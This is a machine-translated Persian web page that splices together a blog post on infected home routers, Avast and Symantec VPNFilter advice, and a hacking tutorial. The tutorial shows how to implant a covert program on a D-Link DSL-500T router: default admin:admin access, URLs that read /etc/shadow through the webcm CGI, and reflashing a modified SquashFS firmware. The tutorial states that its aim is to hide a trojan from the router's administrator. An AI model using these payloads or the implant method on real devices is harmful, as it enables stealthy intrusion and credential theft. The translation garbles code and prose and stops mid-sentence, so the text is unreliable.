خوانندگان عزیز. برای صرفه جویی در وقت شما. بلافاصله در مورد چیز اصلی. همه موارد زیر به وجود تروجان ها یا ویروس ها در رایانه شما به مدت 5 تا 7 روز کمک می کند. در این مدت، اسکن هایی از اینترنت وجود دارد، اما پس از هک، سکوت مشکوکی رخ می دهد - اسکن وجود ندارد - روتر آلوده دیگر اجازه ورود به رایانه شخصی را نمی دهد، دستورات را می پذیرد و آنها را اجرا می کند. این بر سرعت اینترنت تأثیر می گذارد - سقوط می کند.

اگر روتر شما قبلاً آلوده شده باشد، پس سرقت FTP، ایمیل و سایر رمزهای عبور موضوعی در آینده نزدیک است.

قبلاً در سال 2009 یکی از DroneBL جهان را در مورد اپیدمی (آغاز؟) ویروس هایی که روترها را تحت تأثیر قرار می دهند، مطلع کرد. اخبار او پس از حمله به سایت ظاهر شد، مدیران این سایت فاش کردند که این یک نوع اساساً جدید در بین حملات Ddos است. این حمله توسط روترهای آلوده انجام شد. بنابراین اکنون، "خانواده" رایانه های زامبی دوباره پر شده است - روترهای زامبی. یک شبکه بات نت کشف شد که از روترهای خانگی آلوده تشکیل شده بود! آنها این شبکه را "psyb0t" نامیدند. اینگونه بود که اپیدمی ویروس روتر رسما آغاز شد.

هک با اسکن پورت های روتر و در دست گرفتن کنترل روی آن رخ می دهد. متأسفانه، مقالاتی در اینترنت در مورد اینکه دقیقاً چگونه این یا آن مدل از روتر ساده ترین هک است، در حال افزایش است. اما آنجاست که می توانید یاد بگیرید چگونه از خود در برابر این فاجعه محافظت کنید. پس از کنترل روتر، جاسوسی از محتویات ترافیک عبوری آغاز شد. سرقت رمز عبور پیوستن به فعالیت های مخرب عمومی شبکه بات نت در اینترنت جهانی. اسکن پورت های یک کامپیوتر خانگی، اما در اینجا با جزئیات بیشتری صحبت خواهم کرد. نویسنده توانست ردیابی کند که وجود اتصال شبکه به یک روتر هک شده منجر به چنین مشکلاتی می شود. هنگام نصب مجدد فایروال در سیستم "از هیچ جا" ویروس ها ظاهر می شوند. هنگامی که سعی می‌کنید دبیان یا اوبونتو را هنگام دانلود به‌روزرسانی‌ها در طول مراحل نصب نصب کنید، این سیستم‌ها به درستی نصب نشدند. برای مثال

  1. راه اندازی Firestarter نصب شده غیرممکن است - عملکرد اداری راه اندازی می شود و تمام. یعنی چیزی با امتیازات مدیریت اجرا می شود، اما چیزی که مشخص نیست. Firestarter فقط شروع نمی شود.
  2. اگر اتصال به اینترنت وجود داشته باشد، Deadbeef شروع نمی شود، هنگامی که روتر خاموش است، بلافاصله روشن می شود.
  3. برخی از برنامه هایی که نیاز به امتیازات ادمین دارند بدون درخواست رمز عبور اجرا می شوند، بقیه اصلا اجرا نمی شوند.
  4. پس از نوشتن این مقاله، این نکات کمتر به چشم می خورد. یعنی مشکلاتی وجود خواهد داشت، اما آنها متفاوت به نظر می رسند.

نصب مجدد در همان رایانه، از همان دیسک نصب، با روتر خاموش، با موفقیت انجام شد. سیستم (تست شده در اوبونتو) مانند ساعت کار می کرد. این تعجب آور نیست، زیرا روترهایی با سیستم عامل لینوکس Mipsel اولین کسانی بودند که آسیب پذیر بودند. البته آسیبی که از یک روتر زامبی می‌آید «متنوع‌تر» از آن چیزی است که من در اینجا متوجه شدم و توضیح دادم، اما آنچه ما در حال حاضر ثروتمند هستیم همان چیزی است که به اشتراک می‌گذاریم...

ویندوز نصب شده (با روتر آلوده غیرفعال شده) "زنده ماند"، اما Agnitum Outpost Firewall Pro اسکن پورت ها را از همان دقایق اولیه پس از نصب شناسایی کرد. آن ها روتر به پورت(ها) حمله می کند.

برنج. اسکن پورت های من از اینترنت و در نهایت از یک روتر آلوده.

همانطور که در شکل مشاهده می کنید، در تاریخ 2017/04/27 در ساعت 23:51:16، یک اسکن قبلا از روتر زامبی انجام شد. قبل از آن، اسکن هایی از شبکه امنیتی کسپرسکی وجود داشت - 130.117.190.207 (دیوار آتش آنها را "پسند" نمی کند، اما این هنجار با نصب Kaspersky است) و مشخص نیست کجاست. و در تاریخ 04/27/12، روتر به تنظیمات کارخانه بازنشانی شد (Huawei HG530). از آن زمان، آنها فقط از شبکه امنیتی Kaspersky - 130.117.190.207 و ARP_UNWANTED_REPLY - می آیند - نویسنده فیلتر کردن ARP را روشن کرده است. بنابراین، تلاش‌های روتر برای "صحبت" مجدد با رایانه شخصی (این فعالیت عادی روتر است - اما اکنون Agnitum فقط به آن دسته از پاسخ‌های ARP که در پاسخ به درخواست رایانه شخصی من می‌آیند) و همچنین تلاش‌ها اجازه می‌دهد. توسط برخی از افراد برای رهگیری ترافیک با استفاده از یک پاسخ ARP جعلی، توسط فایروال مسدود می شوند. اگر کسی ترافیک من را به این طریق رهگیری کند و آن را از طریق رایانه خود عبور دهد، من در نقش یک کارمند دفتر با استفاده از اینترنت خواهم بود، در حالی که مدیر سیستم این شرکت همه اقدامات من را می بیند و گزارش مفصلی برای رئیس تهیه می کند. چند نامه (به چه کسی، در مورد چه چیزی) نوشته شده است، چند نفر در ICQ چت کرده اند. البته رمزهای ایمیل و غیره. آنها نیز می توانند سرقت کنند.

خط پایین - از لحظه ای که روتر خود را تنظیم مجدد کردم و آنچه را که در زیر توضیح خواهم داد انجام دادم، هیچ حمله ای از اینترنت وجود ندارد. "تفنگچی" حذف شده است، روتر تمیز است و فقط کاری را انجام می دهد که برای آن ایجاد شده است. اما تروجان روی رایانه شخصی نیز باید حذف شود، در غیر این صورت از قبل هکرها را به IP شما هدایت می کند.

کسانی که تجهیزات شبکه می سازند هیچ اقدام حفاظتی ارائه نمی دهند. دستورالعمل روترها حاوی توضیحاتی در مورد نحوه وارد کردن لاگین و رمز عبور برای دسترسی به ارائه دهنده است، اما هیچ کلمه ای وجود ندارد که رمز عبور پیش فرض ادمین را نمی توان در روتر گذاشت! علاوه بر این، روترها لزوما دارای کنترل از راه دور هستند که اغلب شامل آنها می شود. سازندگان نرم افزارهای ضد ویروس ساکت هستند. بی اختیار این سوال پیش می آید که چه کسانی از این کار سود می برند.

راه های عفونت

بهتره یه بار ببینی برای آن یک انیمیشن GIF با تجزیه و تحلیل شماتیک از موقعیت پیشنهاد می کنم. اگر قابل مشاهده نیست، Adblock یا چیزی شبیه به آن تداخل دارد - آن را در این صفحه خاموش کنید.

دو تا از آنها موجود است. اولین مورد از طریق WAN، با نام مستعار اینترنت است. آن ها هکرها IP شما را پیدا می کنند، به عنوان مثال، زمانی که فایل ها را با استفاده از پروتکل تورنت دانلود یا توزیع می کنید (در این مورد در انتهای مقاله بیشتر توضیح داده شده است) و با اسکن IP شما نقاط ضعفی در محافظت از روتر پیدا می کنند. اما کمتر رایج است. نحوه بستن این دروازه ها را در این مقاله بخوانید.

یا یک تروجان روی رایانه شخصی ما وجود دارد. و سپس هکرها را به IP پویا (!) ما هدایت می کند. با دانستن این آدرس، آنها قبلاً به طور روشی روتر را "چکش کاری" می کنند. در مورد تروجان ها در راه دوم عفونت خواندیم.

مورد دوم از طریق LAN است، یعنی از رایانه شما. اگر یک تروجان روی رایانه شخصی شما وجود داشته باشد، هکرها می توانند رمز عبور روتر را مستقیماً از رایانه شخصی شما حدس بزنند. بنابراین، این رمز عبور باید گاهی اوقات تغییر کند. اما در مورد این واقعیت که یک رایانه آلوده سعی می کند روتر را از سمتی هک کند که محافظت نمی کند، چه می شود؟ ابتدا باید بدانید که یک روتر تمیز با یک رایانه شخصی آلوده دوام زیادی نخواهد داشت. فورس معمولی (حدس زدن رمز عبور brute-force) آن را در عرض یک هفته یا حتی سریعتر از بین می برد. بنابراین، اگر مجبور هستید روتر خود را مرتباً تمیز کنید، وقت آن است که به پاکسازی کامل ویروس ها فکر کنید.

و الان لحظه ویروس / تروجان از کجا در رایانه شخصی می آید؟ دلایل اصلی و راه حل ها را در پرانتز لیست می کنم. گزینه ها عبارتند از:

1- ویندوز کرک شده اولیه نصب شده است (از دیسک های نصب تمیز استفاده کنید).

2- ویندوز را بعد از نصب غرغر کنید (یا تحمل کنید و ماهانه دوباره نصب کنید یا ویندوز بخرید).

3 - نرم افزار کرک شده (استفاده از برنامه های رایگان یا خرید پولی)

4 - ویروس در فایل های شخصی شماست (همانطور که در پاکسازی سیستم از ویروس ها توضیح دادم تمامی فایل های شخصی را از طریق پاکسازی اجرا کنید).

5 - سیستم قبلاً در حین استفاده از طریق فلش درایو آلوده شده است ، اینترنت ، جهنم می داند چگونه (محافظت - ما اینترنت را به روش ایمن مطالعه می کنیم ، در مورد درایوهای فلش ، در مورد آخرین نکته سکوت خواهم کرد).

به طور جداگانه، متذکر می شوم که با کشف IP روتر، هکرها شروع به اسکن آن می کنند تا به رمز عبور رمزگذاری شده دسترسی پیدا کنند و سپس با استفاده از رمز عبور سرقت شده، کنترل را به دست می گیرند. بنابراین، اگر اکنون به دسترسی به اینترنت نیاز ندارید، روتر را روشن نگذارید.

ولی!!! حتی اگر با استفاده از ماشین مجازی دانلود کنید، روتر شما شروع به چکش می کند. غیرفعال کردن آن و فعال کردن مجدد آن در این فرآیند به اینجا کمک می کند، و مهم ترین چیز پس از دانلود تورنت این است که ارائه دهنده یک IP پویا جدید پس از راه اندازی مجدد روتر صادر می کند و هکرها فقط باید حدس بزنند که آدرس شما در حال حاضر چیست. بر. و روتر شما هم... البته روی توزیع ها نمی مونید - بعد از اتمام دانلود باید فورا برنامه دانلودر تورنت رو خاموش کنید و بعد از اون روتر رو خاموش و روشن کنید.

و به طور کلی

روتر را غیر ضروری روشن نکنید! اجازه ندهید یک بار دیگر هکرهای کوچک وارد ملک خود شوند... فراموش نکنید که هر بار که سرعت اتصال به اینترنت بی دلیل کاهش می یابد، روتر را تمیز کنید. مراقب بودن ضرری نداره...

خب همه چی اکنون می توانید دستورالعمل های کارخانه روتر خود را بردارید و لاگین و رمز عبور صادر شده توسط ارائه دهنده اینترنت را مشخص کنید. این معمولاً در تب تنظیمات WAN انجام می شود. اکنون روتر شما از طریق اینترنت قابل کنترل نیست. حداقل فعلا.

روتر شما یکی از ضعیف ترین لینک ها در امنیت شماست و محققان بار دیگر آن را ثابت کرده اند.

شصت حفره امنیتی در 22 مدل روتر در سرتاسر جهان یافت شد که بیشتر در مدل هایی که ISP ها برای مشتریان خود ارائه می کردند. وجود این آسیب‌پذیری‌ها می‌تواند به هکرها اجازه دهد تا به دستگاه‌ها نفوذ کنند، رمز عبور را تغییر دهند و اسکریپت‌های مخربی را که سرورهای DNS را تغییر می‌دهند، نصب و اجرا کنند. بنابراین، هکرها می توانند هنگام بازدید از صفحات وب رسمی، شما را به وب سایت های مخرب هدایت کنند یا کدهای مخرب را در رایانه خود دانلود کنند.

این آسیب‌پذیری‌ها همچنین به هکرها اجازه می‌دهد تا اطلاعات را روی دستگاه‌های ذخیره‌سازی USB متصل به یک روتر آسیب‌دیده بخوانند و بنویسند.

این مطالعه توضیح می‌دهد که چگونه مهاجمان می‌توانند به رایانه شخصی دسترسی پیدا کنند - یعنی از طریق یک درب پشتی با رمز عبور جهانی، که توسط پرسنل ارائه‌دهنده فنی برای کمک از راه دور به مشتریان از طریق تلفن استفاده می‌شود. این دسترسی مدیر دوم به طور پیش فرض از صاحب روتر پنهان است.

چه مدل های روتر تست شده اند؟

محققان مدل‌های زیر را آزمایش کردند: Amper Xavi 7968، 7968+ و ASL-26555. آستوریا ARV7510; بلکین F5D7632-4; cLinksys WRT54GL; Comtrend WAP-5813n، CT-5365، AR-5387un و 536+; D-Link DSL-2750B و DIR-600; Huawei HG553 و HG556a; ; Netgear CG3100D; Observa Telecom AW4062، RTA01N، Home Station BHS-RTA و VH4032N؛ Sagem LiveBox Pro 2 SP and Fast 1201 و Zyxel P 660HW-B1A.
از آنجایی که محققان اهل مادرید هستند، تمرکز اصلی تحقیقات آنها روترهایی بود که توسط ارائه دهندگان اینترنت اسپانیایی ارائه می شود، اما Linksys، D-Link و Belkin به طور گسترده در روسیه و سایر کشورها استفاده می شوند.

چگونه می توانید از روتر خود محافظت کنید؟

همه آنتی ویروس های Avast دارای ویژگی داخلی Home Network Security (HNS) هستند که شبکه های Wi-Fi با پیکربندی ضعیف را اسکن می کند، رمزهای عبور ضعیف یا پیش فرض Wi-Fi، آسیب پذیری های روتر، اتصالات اینترنتی هک شده و پروتکل IPv6 فعال اما غیر ایمن را نشان می دهد. . این عملکرد همچنین لیستی از دستگاه های متصل به شبکه را نشان می دهد که به شما کمک می کند مطمئن شوید که فقط دستگاه هایی که می شناسید به شبکه شما متصل هستند. Avast تنها شرکت امنیت اطلاعات است که توانایی ایمن سازی این منطقه را ارائه می دهد.

چگونه روتر خانگی خود را با امنیت شبکه خانگی اسکن کنیم؟

رابط کاربری Avast را باز کنید، روی دکمه Scan از منوی سمت چپ کلیک کنید، سپس Network Threat Scan را انتخاب کنید.
Avast روتر شما را اسکن می کند و گزارشی از تهدیداتی که پیدا می کند ارائه می دهد. در بیشتر موارد، اگر تهدیدی شناسایی شود که به توجه شما نیاز دارد، Avast شما را به وب سایت سازنده روتر هدایت می کند.

VPNFilter تهدیدی است که بر طیف گسترده ای از مدل های ذخیره سازی متصل به شبکه (NAS) روتر و شبکه تأثیر می گذارد. VPNFilter می تواند اطلاعات حساس را جمع آوری کند و با ترافیک شبکه تعامل داشته باشد و همچنین عملکرد روتر را مختل کند. این بدافزار پس از راه اندازی مجدد روتر جان سالم به در می برد.

سیمانتک یک ابزار آنلاین رایگان برای بررسی سریع VPNFilter روی روتر شما ارائه می دهد.

اطلاعات مهم

ابزار آنلاین بررسی می کند که آیا دستگاه شما توسط مؤلفه VPNFilter معروف به پلاگین ssler در معرض خطر قرار گرفته است یا خیر. اگر روتر شما به پلاگین ssler آلوده نشده باشد، همچنان می تواند توسط سایر تهدیدها یا اجزای VPNFilter در معرض خطر قرار گیرد.

اگر نگران یا مشکوک هستید که روتر شما به VPNFilter آلوده شده است، باید توصیه های زیر را دنبال کنید.

در صورت عفونت چه باید کرد

اگر نگران هستید که روتر شما به VPNFilter آلوده شده باشد، توصیه می کنیم این مراحل را دنبال کنید:

  1. روتر خود را برای بازیابی تنظیمات کارخانه بازنشانی کنید. ابتدا پیکربندی روتر خود را ذخیره کنید، زیرا پس از آن باید آن را دوباره پیکربندی کنید.
  2. روتر را خاموش و راه اندازی مجدد کنید. لطفاً توجه داشته باشید که راه‌اندازی مجدد روتر بدون بازنشانی کارخانه، VPNFilter را حذف نمی‌کند.
  3. رمز عبور سرپرست روتر خود را به رمز عبور ایمن تر تغییر دهید. در صورت امکان، در حین انجام این مرحله، روتر خود را از اینترنت جدا کنید.
  4. آخرین به روز رسانی ها و سیستم عامل روتر خود را نصب کنید.

سلام خواننده من! در این مقاله در مورد روترهای فوق العاده ADSL صحبت خواهم کرد.
- قطعات آهنی ضروری در شبکه های خانگی و صنعتی. من در مورد سوال به شما می گویم
بهره برداری از این قطعات آهن برای مقاصد مفید برای ما - خیاطی وحشیانه
تروجان داخل روتر و به گونه ای که هیچکس متوجه نشود
مدیر هوشمند، بدون کاربر گوش بزرگ.

خواسته ها یا الزامات IQ

وقتی این مقاله را نوشتم، تصور کردم که خواندن آن کافی است
یک کاربر پیشرفته با GNU\Linux نصب شده که مهارت هایی نیز دارد
کار و برنامه نویسی در این سیستم عامل. با این حال، به نظر می رسد
امکان تکرار مراحل من در ویندوز (برای مثال با استفاده از Cygwin)، اما
شرح داده نخواهد شد. برای حداکثر لذت، شما نیز نیاز دارید
مهارت های آهن لحیم کاری (این اختیاری است).

و همه چیز شروع شد...

چیزی که من از آن دوری می کنم. بنابراین، همه چیز از این شروع شد که چگونه یک روز این بسیار
یک قطعه آهن، یا بهتر است بگوییم، خیانتکارانه اتصال به اینترنت را قطع کرد و نشد
می خواست آن را بازیابی کند در همان زمان، او دور بود، دسترسی فیزیکی
او آنجا نبود (اما من در مورد چیزی دروغ گفتم - خیلی تنبل بودم که از روی مبل بلند شوم
روتر را دوباره راه اندازی کنید :))، رابط وب پاسخ نداد، اما من آن را به یاد آوردم
این چیز باید telnet یا ssh باشد. وارد بخش مدیریت شوید
قبلاً تلاش نکرده بودم و بدون ملاحظه رمز عبور حساب کاربری خود را تغییر نداده بودم (همانطور که
بعداً معلوم شد، بیهوده، زیرا به طور پیش فرض "admin: admin" است). پس من
SSH را امتحان کرد و کار کرد!

$ ssh [ایمیل محافظت شده]
$Password:

مثل یک پیچ از آبی! Busybox! هرگز به این فکر نکردم که تحت چه کسی است
این روتر در کنترل است، معلوم است - گنو / لینوکس! ترسیدم
من تعجب می کنم که همه چیز اینجا چگونه کار می کند، و از نظر ذهنی به لطف تنبلی و شانس، من
شروع به تحقیق کرد

مجموعه اطلاعات

پس از کجا شروع کردم؟ البته از لیست دستورات موجود:

#جعبه مشغول
...
توابع تعریف شده فعلی:
[, خاکستر, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep، hostname، id، ifconfig، init، insmod، kill، ln، login، ls، lsmod، mkdir،
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
همگام سازی، تار، تست، tftp، لمس، درست، tty، مقدار، wget، whoami، بله

این مجموعه کاملا سالم است، برای تحقیق عادی و اجرای ایده ها کافی است.
بعد، علاقه به نسخه هسته ایجاد شد:

# cat /proc/version
نسخه لینوکس 2.4.17_mvl21-malta-mips_fp_le ( [ایمیل محافظت شده]) (gcc نسخه 2.95.3
20010315 (انتشار/MontaVista)) #1 پنجشنبه 28 دسامبر 05:45:00 CST 2006

برای مرجع: MontaVista توزیعی است که بر روی embedded متمرکز شده است
سیستم های. اکثریت قریب به اتفاق تولید کنندگان تجهیزات شبکه انفاق می دهند
اولویت برای این سیستم همچنین می توان آن را در دستگاه های دیگر، به عنوان مثال، در
کتاب های الکترونیکی یا تلفن های همراه.

# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
پردازنده
: 0
مدل cpu
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
دستورالعمل صبر کنید: خیر
تایمرهای میکروثانیه: بله
بردار وقفه اضافی: بله
نقطه نظارت سخت افزاری: بله
استثناهای VCED: در دسترس نیست
استثناهای VCEI: در دسترس نیست

AR7 یک تراشه دو هسته ای است که توسط Texas Instruments ساخته شده است. او
شامل یک روتر ADSL تمام عیار بر روی یک تراشه است که از استانداردهای ADSL1 پشتیبانی می کند،
ADSL2,ADSL2+. بر اساس پردازنده MIPS 4KEc RISC با کارایی بالا، با
فرکانس ساعت 175 یا 233 (بسته به تکنولوژی تولید: 18 میکرومتر
یا 13 میکرومتر). این تراشه شامل 2 رابط UART روی برد است که یکی از آنها (UART_A)
برای خروجی اطلاعات اشکال زدایی و همچنین یک رابط EJTAG که خدمت می کند استفاده می شود
برای اشکال زدایی (سیرم افزار) حافظه فلش. در مورد استفاده از این رابط ها خواهد بود
در زیر شرح داده شده است.

در نهایت به اطلاعات حافظه نگاه کردم:

# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
هیچ /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# cat /proc/mtd
dev: اندازه پاک کردن نام
mtd0:0034f000 00010000 "mtd0"
mtd1:00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

به طور طبیعی، آدرس های بلوک را فراموش نکنید:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000.0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

از موارد فوق، نتیجه این شد که حافظه فلش (/dev/mtdblock) دارای 5 بلوک است:

mtd0- تصویر سیستم فایل SquashFs. این یک فایل خاص است
سیستمی که فشرده و فقط خواندنی است. برای
الگوریتم فشرده سازی gzip است، اما در این مورد LZMA (نسبت فشرده سازی) است.
در بالا). حجم این بلوک 4 مگابایت است.

mtd1– این بلوک شامل هسته MontaVista است که توسط الگوریتم LZMA فشرده شده است
شرایط، اندازه بلوک 600 کیلوبایت.

mtd2– بوت لودر ADAM2، بوت هسته را انجام می دهد، همچنین دارد
سرویس سرور FTP برای بازیابی و فلش. بیشتر در مورد آن خواهد بود
در ادامه گفت. حجم بلوک 64 کیلوبایت است.

mtd3- بین داده های پیکربندی و محیط به اشتراک گذاشته می شود
بلوک (متغیرهای محیطی) که در /proc/ticfg/env قابل مشاهده است.
داده های پیکربندی در /etc/config.xml هستند. یک واسطه بین فایل
بلوک پیکربندی سیستم بسته است (مانند تمام cm_*هایی که کنترل، o
آنها بعدا) برنامه cm_logic. حجم این بلوک نیز 64 کیلوبایت است.

mtd4- این شامل امضای سیستم عامل، هسته و تصویر فایل است
سیستم های. این بلوک هنگام به روز رسانی سیستم عامل از طریق رابط وب استفاده می شود.
ابتدا در این بلوک ذخیره می‌شود، سپس چک‌سام بررسی می‌شود
و اگر همگرا شود، به مکان جدیدش نوشته می شود.

رم (16 مگابایت در این مدل، اما ADAM2 در این مدل
فقط 14 مگابایت را می بیند، با یک به روز رسانی درمان می شود)، در پوشه /var نصب می شود، و
می توان با خیال راحت برای اهداف ما استفاده کرد:

# رایگان
کل بافرهای مشترک رایگان استفاده شده
مم: 14276 10452 3824 0

فراموش نکنیم که فهرستی از فرآیندها را مرور کنیم. از موارد جالبی که اینجا در کمین است
دیمون ها: thttpd - وب سرور؛ dproxy - کش کردن پرس و جوهای DNS سرور پروکسی. ddnsd
- دیمون DNS pppd... - دیمون واقعی که اتصال پروتکل را پیاده سازی می کند
PPP، و در پارامترها اطلاعات حساب را می بینیم. بنابراین، اگر روتر نیست
وانمود می کند که شلنگ است (بخوانید - نه در حالت پل)، سپس می توانید
آسان برای گرفتن یک حساب کاربری

برنامه های cm_* اختصاصی هستند و قبلاً در کدهای منبع گنجانده شده اند.
کامپایل شده (این برنامه ها نیز توسط Texas Instruments در D-Link توسعه یافته اند
نیازی به قسم خوردن برای عدم رعایت مجوزها نیست).

cm_logic- برنامه ای که منطق سیستم را از طریق آن کنترل می کند
پیکربندی را پاس می کند. /etc/config.xml را با آن همگام می کند
قسمت مربوطه از محتویات /dev/ticfg (اشاره به mtd3).

cm_cli- رابط خط فرمان برای مدیریت و پیکربندی
سیستم های. برای مثال تنظیمات اتصال از طریق این رابط انجام می شود.

cm_pc- راه اندازی و نظارت بر فرآیندها، پیوند با قوانین
(به عنوان مثال، برنامه را به عنوان یک شبح اجرا کنید، قوانین همچنین شامل اطلاعاتی در مورد
پورت برای باز کردن) همانطور که در /etc/progdefs.xml توضیح داده شده است. بلافاصله پس از بارگیری
هسته ها

webcm- رابط CGI پر از سوراخ است، به عنوان مثال به شما اجازه می دهد به /etc/shadow نگاه کنید،
به سادگی با دسترسی به URL.

http://192.168.1.1/../../../etc/shadow

چیزی متوجه نشدم، thttpd چندان ساده نیست، اما اگر چنین است:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

یک چیز دیگر. در صورت عدم دسترسی می توان از این برای جمع آوری اطلاعات استفاده کرد
ssh/telnet، اما دسترسی به رابط وب وجود دارد.

firmwarecfg- برای فلش زدن از طریق رابط وب استفاده می شود. در ورودی
از این برنامه، یک تصویر توسط یک درخواست POST از رابط وب منتقل می شود، و قبلاً نیز انجام شده است
پس از بررسی چک مجموع تصویر به Flash-memory تغییر مسیر می دهد.

این مجموعه اطلاعات اولیه را کامل می کند، وقت آن است که به سمت تصمیم گیری حرکت کنید
اقدامات.

نصب ابزارهای توسعه و کامپایل سیستم عامل

سفت‌افزار برای روترهای D-Link (و سایر موارد مبتنی بر گنو/لینوکس)
توزیع شده تحت مجوز GPL، می توانید آنها را در رسمی دریافت کنید
سرور FTP در واقع، شما می توانید هر یک از لیست سیستم عامل های پیشنهادی را انتخاب کنید،
آنها یکسان هستند (در مورد سری T). در تحویل - کد منبع هسته، محیط،
ابزارها و زنجیره ابزار لازم برای توسعه/تدوین موجود
برنامه ها. باید به root باز شود و به متغیر محیط اضافه شود
مسیر PATH به دایرکتوری bin toolchain:

$ tar xvf tools.tgz
$ صادرات PATH=$PATH:/opt/

اکنون برای کامپایل سیستم عامل خود، به دایرکتوری بروید
با کدهای منبع و اجرای همین ساخت.

$ cd DSL/TYLinuxV3/src && make

سوالات زیادی در مورد فعال کردن پشتیبانی دستگاه پرسیده می شود (بهتر
به آنها پاسخ مثبت دهید). در پایان کامپایل در دایرکتوری TYLinuxV3/images
تصاویر سیستم عامل ایجاد خواهد شد. همچنین می توانید اسکریپتی را با همان نام خود اجرا کنید.
مدل از دایرکتوری /TYLinuxV3/src/scripts.

چند کلمه در مورد انتقال فایل بین روتر و کامپیوتر. اولین
روشی که من استفاده کردم توانایی انتقال فایل ها با استفاده از پروتکل SSH است.
برای این کار از برنامه scp استفاده کنید. اما کمی بعد متوجه شدم که mc (نیمه شب
Commander) همچنین قابلیت اتصال از طریق SSH (پنل -> اتصال شل) را دارد.
از طرف دیگر، می توانید یک سرور وب یا FTP را در محل کار خود راه اندازی کنید. بعدا من
به وب سرور ترجیح داده شد، زیرا سریعتر کار می کند. من نصب کردم
thttpd، کوچک و سریع، درست مانند روتر. ما در خانه راه اندازی می کنیم و ادامه می دهیم
فایل روتر، پس از رفتن به پوشه /var (همانطور که گفته شد
قبلاً برای ضبط در دسترس بود).

$ thttpd -g -d ~/ForRouter -u user -p 8080
# سی دی /var
# wget http://192.168.1.2/file

برای دانلود یک فایل از روتر، می توانید وب سرور را نیز بالا ببرید:

# thttpd -g -d /var -u ریشه -p 8080

توجه کنید، اگر می خواهید یک فایل اجرایی از روتر دانلود کنید، باید
حذف حقوق راه اندازی هنگام دانلود تعداد زیادی فایل از روتر
بهتر است از mc استفاده کنید، لازم نیست ابتدا فایل ها را در /var کپی کنید و
حقوق را حذف کنید و سپس این فایل ها را حذف کنید تا فضا آزاد شود. به طور کلی، موضوع
سلیقه، هر گزینه ای که برای شما مناسب است را انتخاب کنید.

ایجاد برنامه خود

بیایید، البته، با کلاسیک های برنامه نویسی - HelloWorld - شروع کنیم. برخی خاص
مقرراتی در کار نیست. متن برنامه به طرز دردناکی آشناست:

#عبارتند از
#عبارتند از

int main (void)
{
printf("Mate.Feed.Kill.Repeat.");
بازگشت 0;
}

ما کامپایل می کنیم (مسیر زنجیره ابزار "و باید در متغیر محیطی مشخص شود
مسیر):

$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell

# سی دی /var
# chmod + x hell
# ./جهنم

و ... هیچ اتفاقی نمی افتد، یا مسیری که اعلان پیدا نشد از بین می رود. چیست
یک کسب و کار؟ قبلاً در مورد cm_pc صحبت کردم - این برنامه برنامه های دیگر را راه اندازی می کند
طبق قوانین توضیح داده شده در /etc/progdefs.xml. زمانش فرا می رسد
تصاویر سیستم فایل را اصلاح و فلش کنید.

اصلاح سیستم فایل

برای تغییر سیستم فایل، ابتدا باید
باز کردن بسته بندی همانطور که اشاره کردم، فایل سیستم در اینجا SquashFs با پچ LZMA است.
بسته توسعه سیستم عامل فقط شامل برنامه mksquashfs (برای ایجاد
تصویر)، unsquashfs (برای باز کردن بسته بندی) وجود ندارد. اما مهم نیست، همه چیز در دسترس است
در وب سایت سیستم فایل، به نسخه اول نیاز داریم. با اعمال پچ LZMA و
با جمع آوری وسایل برقی ، آنها را در مکانی مناسب کنار می گذاریم. ابتدا بیایید یک تصویر بگیریم
سیستم فایل از روتر:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$unsquashfs fs.img unpacked_fs

اکنون می‌توانید آن‌طور که دوست دارید تغییر دهید، اما ما می‌خواهیم FuckTheWorld را وارد کنیم
دایرکتوری /bin و یک قانون برای اجرا در /etc/progdefs.xml اضافه کنید.

$ cp سلام unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

و این را اضافه کنید (بین تگ ها ):

جهنم
/bin/hell

ذخیره و بسته بندی مجدد:

$ mksquashfs unpacked_fs my_fs.img -noappend

توجه داشته باشید که تصویر سیستم فایل نباید بیشتر شود
اندازه های مجاز اگر می خواهید فوراً چیزی را امتحان کنید، اما این کار را نمی کند
مناسب است، چیزی "غیر ضروری" مانند grep، whoami، یا را از تصویر حذف کنید
از بسته‌بندی اجرایی UPX استفاده کنید. اکنون در روتر آپلود کنید
تصویر را بگیرید و به بخش بعدی بروید.

گرفتن تصویر سیستم فایل

راه فلش کردن روتر بسیار ساده است، این شامل دسترسی به دستگاه است
/dev/mtdblock/*. بنابراین، تصویر فایل را به هر روشی مناسب در روتر آپلود کنید.
سیستم و این عمل ساده را انجام دهید:

# cat my_fs.img > /dev/mtdblock/0 && راه اندازی مجدد

# cp my_fs.img /dev/mtdblock/0 && راه اندازی مجدد

پس از مدتی، هنگامی که فرآیند ضبط به پایان رسید، روتر راه اندازی مجدد می شود، و
تغییرات اعمال خواهد شد بیایید سعی کنیم مثال خود را اجرا کنیم:

#جهنم
Mate. Feed. Kill. Repeat.

راه های بازیابی در صورت شکست

قبل از فلش کردن روتر با "صنایع دستی" جدی تر، باید یاد بگیرید که چگونه
در موارد بحرانی که روتر امتناع می کند، عمل کنید
بار. هیچ موقعیت ناامید کننده ای وجود ندارد. سرور ADAM2 FTP به کمک می آید. برای
ابتدا باید کلاینت FTP را روی آدرس IP ADAM2 اجرا کنید، که می توان آن را پیپ کرد
در /proc/ticfg/env (پارامتر my_ipaddress).

ftp $ 192.168.1.199
سرور FTP 220 ADAM2 آماده است.
530 لطفا با USER و PASS وارد شوید.

برای وضوح، می توانید حالت اشکال زدایی و سپس همه را روشن کنید
اطلاعات و تمام پاسخ های FTP:

